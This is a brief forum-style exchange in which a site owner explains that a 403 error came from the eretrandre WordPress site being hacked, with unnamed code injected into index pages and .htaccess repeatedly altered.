I was unable to access the site for a few days till right now.

I got the 403 error.

Yes, unfortunately the whole eretrandre site was hacked. And the 403 error was a rather unwanted side effect.
On each index page there was put the code

This was unnoticed by me and may have happened September or October 2012. But by some mechanism in wordpress it now tried to change some .htaccess file, which resultet in that 403.

I upgraded software but the risk still remains.

Also now I noticed there were users who did post.

the site was up for some hours, until it automatically again tried to change the .htaccess and again resulted in 403.
